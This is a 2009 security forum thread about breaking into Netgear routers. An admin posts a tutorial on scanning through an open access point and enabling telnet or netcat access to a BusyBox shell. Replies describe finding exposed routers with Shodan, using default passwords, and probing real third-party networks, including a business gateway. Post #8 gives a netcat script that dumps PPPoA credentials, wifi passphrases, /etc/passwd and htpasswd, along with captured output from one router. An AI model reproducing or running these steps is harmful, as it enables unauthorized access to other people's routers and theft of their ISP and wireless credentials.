Government Security
Network Security Resources

Jump to content

Photo

Detailed Netgear Router Exploit

- - - - - security windows linux scanning scanner network exploit router tools tutorial
  • Please log in to reply
9 replies to this topic

#1 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 02 December 2009 - 03:11 AM

Here is a Link to the Full article i wrote hope you enjoy ;)

This Article will show you how to Access the router inject a command , enabling Telnet or Netcat access.. it is a step by step Tutorial with images account.

==================================================


Netgear Router Hack

30/11/2009

Hello all

Kenny from GSO Admin here showing you a Demo of gaining access to a Netgear Router...then Telnet or Netcat to the Target

Reason i wrote this is it’s for Educational purposes for the GSO Tutorials Section. Old news for many...Still it adds content to GSO : http://www.governmentsecurity.org

DETAILS:

Tools i will be using are: Angry IP Scanner , Firefox and Telnet or Netcat

For this Demo i have to make some changes: One instead of using Linux which i use most of the time I will be using XP Pro as the majority of GSO users use Windows in one form or Another ...
But the router Commands will be in the traditional Linux inputs

1) I am NOT using my ISP for this Hack..What i have done is found an open Un-encrypted Access Point to launch my attack after scanning my local area and switched to the open router AP.

2) First i am going to scan a network for open ports mainly :23,80 .This will give at least Port 80 needed to inject the code

Posted Image

SNIP<

CLICK BELOW TO READ FULL VERSION

PART 1


PART 2






........................
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#2 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 02 December 2009 - 04:44 PM

Nice tutorial Kenny. Was particular interested in the Netgear aspect (as I have one myself).

You scanned a public range of IP addresses and then pinpointed which ones were Netgear yeah? I was playing around with Shodan search. (I have to say it is one of the coolest new services I've seen out in a while - and now there is a FF plugin) http://shodan.surtri.com/ (Basically it is a search engine which picks up pre-scanned services on the public internet, no need so port scan yourself ;))

I'm veering off the subject a little bit but you may be able to achieve similar preliminary results. Problem being as this service is public most of these boxes would probably be compromised pretty quick. But it gets you thinking of other ways to attack this problem - or some creative searches you may think up before anyone else.

If you search with this command you will find a list of open BusyBox installations. “port:23 “list of built-in commands””
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#3 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 02 December 2009 - 07:30 PM

very nice indeed added to my browser...interesting what you said i had a quick go with a few different inputs ...i got over 500 with one method
another input i got over 3500......also got 11000 of another router make vuln...

am going to experiment see just how useful this plugin is... thanks for the heads up.defiantly handy one way or another )
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#4 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 02 December 2009 - 07:57 PM

Yeah it's sweet. Wish i had more time to play with it. Just did a search for Netgear.... oh when will people learn to change the default password ;)

Extending on your tutorial a bit... as i've never used busybox. I see that wget commands are available. Would it be possible to wget a binary and install that software to NVRAM? Or are there restrictions on these devices? Just toying with the idea if you could install some sort of SSH proxy tunnel in and back out of these devices?

Edit: Was just playing around search for Netgear WAPs on my providers network. Found some open ones. Using your trick someone may be able check the NVRAM... see the ADSL username and password.. which for my provider is usually the same for their online management account for email and billings.. not to mention changing their firewall rules... allow all incoming from <%ip> .. uh oh :P

Edit2: uhh someone may have just found a company running a server and 8 desktops and a POS terminal with an open neatgear as their gateway. Time for someone to stop playing around before he gets into trouble!
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#5 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 03 December 2009 - 07:11 AM

looks like you did the same search as me i also think i got the same server , i also tested about 10 random ip's 60% were using default...these people will learn one day...i have not tested wget yet but would assume it might work within that environment ...all i been doing is snooping around just for gathering info...i have got Busybox compiled and installed on one of my Linux setups...just a case of getting around to testing its full potential....am still experimenting with Busybox ;)
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#6 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 03 December 2009 - 03:52 PM

Just a note: Couldn't get the debug command to work on a Netgear DG834GV.

Another thing of interest: Is there a way to access telnet after the debug command using it's WAN IP address? Firewall fully open. Tested out one and couldn't seem to connect...
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#7 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 04 December 2009 - 03:49 AM

Netgear use various default passwords for some models ... some routers have :

admin
admin

or

admin
1234

and so on

list of some can be found here:

/http://www.routerpasswords.com/ or here /http://www.phenoelit-us.org/dpl/dpl.html

you might have to search for other models defaults

some ISP's have blocked access to Busybox via Telnet or Netcat with Debug enabled via its Firmware img , one being SkyBB no matter what password you use it will not let you in...OllyDb might show more details if the Firmware is disassembled
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#8 Kenny

Kenny

    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 04 December 2009 - 03:58 PM

On a footnote ...i decided to speed up the process of getting details so what i have done is create a list of inputs for instance:


ps
cat /tmp/nvram | grep pppoa_
cat /tmp/nvram | grep wifi_passphrase
cat /tmp/nvram | grep wifi_psk_pwd
cat /etc/syslog.conf
cat /etc/passwd
cat /etc/htpasswd
exit



and called it "inputs.txt"

then created a folder and added "netcat" to it on my desktop along with the "inputs.txt"

then issued this command:

nc <IP> <PORT><file><saved file


Example:

nc 192.168.1.1 23< inputs.txt >results.txt


this then automates the process and saves results to your folder see saved example below:

===========================

ÿýÿý!ÿûÿû

BusyBox v1.00 (2007.06.22-11:05+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
²☺ ²! ¹☺ ¹♥ps

# ps
PID Uid VmSize Stat Command
1 root 268 S init
2 root SW< [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kblockd/0]
17 root SW [pdflush]
18 root SW [pdflush]
19 root SW [kswapd0]
20 root SW< [aio/0]
25 root SW [mtdblockd]
32 root SW [kseriod]
57 root 224 S /usr/sbin/mybuf /var/run/mybuf.in /var/log/vpn
58 root 144 S /usr/sbin/vpn_trigger
97 root 244 S /sbin/klogd
106 root 280 S /sbin/syslogd -f /etc/syslog.conf
116 root 260 S /usr/sbin/mini_httpd -d /www -r NETGEAR DG834G -c **
118 root 260 S /usr/sbin/udhcpd /etc/udhcpd.conf
120 root 264 S /usr/sbin/netgear_ntp -z GMT+0
327 root 244 S /usr/sbin/crond
329 root 172 S /usr/sbin/scfgmgr
333 root 176 S /usr/sbin/cmd_agent_ap
334 root 164 S /usr/sbin/pb_ap
346 root 268 S init
10337 root 524 S /usr/sbin/pppd plugin pppoa 0.38 user *********@talktalk.net
10368 root 500 S dnrd -a 192.168.0.1 -m hosts -c off -b -s ***.***.***.***
16497 root 220 S /usr/sbin/utelnetd -d
16511 root 348 S /bin/sh
16512 root 284 R ps
#
# cat /tmp/nvram | grep pppoa_
pppoa_username=********@talktalk.net
pppoa_password=******
pppoa_idle=0
pppoa_ipaddr=
#
# cat /tmp/nvram | grep wifi_passphrase
wifi_passphrase=*****
#
# cat /tmp/nvram | grep wifi_psk_pwd
wpa_passphrase=*******
#
# cat /etc/syslog.conf
mail_enable=0
mail_enable_auth=
mail_log_full=0
mail_server=
mail_receiver=
mail_login=
mail_password=
mail_subject=NETGEAR Security Log [03:27:6D]
mail_subject_alert=NETGEAR *Security Alert* [03:27:6D]
mail_keyword=[DOS] [PORT SCAN] [BLOCK]
TZ=GMT+0
daylight=
log_auth=1
log_syslog=1
log_local0=1
log_keyword=[DOS] [PORT SCAN] [BLOCK]
#
# cat /etc/passwd
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
#
# cat /etc/htpasswd
admin:password
#
# exit

========================

you can edit the list to put your own inputs and read the data later ;)
Kenny aka ComSec

Please read the Forum Rules !!!

______________________

#9 Marts McFly

Marts McFly

    Global Moderator

  • Colonel
  • 591 posts

Posted 04 December 2009 - 06:13 PM

Ah nice one man! That will make life a little easier.

On a side note - was just reading an article on remote-exploit. They go over how to 'enable' telnet access on a Netgear router which has the Telnet port open but the Telnet service not running. Pretty good information actually. http://forums.remote...ar-routers.html
Certified Information Systems Security Professional (CISSP)

T: http://twitter.com/Marts_McFly

B: http://www.backtosecurity.com

#10 Aldous11

Aldous11

    Private

  • Members
  • 2 posts

Posted 01 October 2010 - 11:44 PM

I enjoy a lot. Its too much informative and helping tutorial. You method of describing is very good and easy to use. Thanks for sharing.





Also tagged with one or more of these keywords: security, windows, linux, scanning, scanner, network, exploit, router, tools, tutorial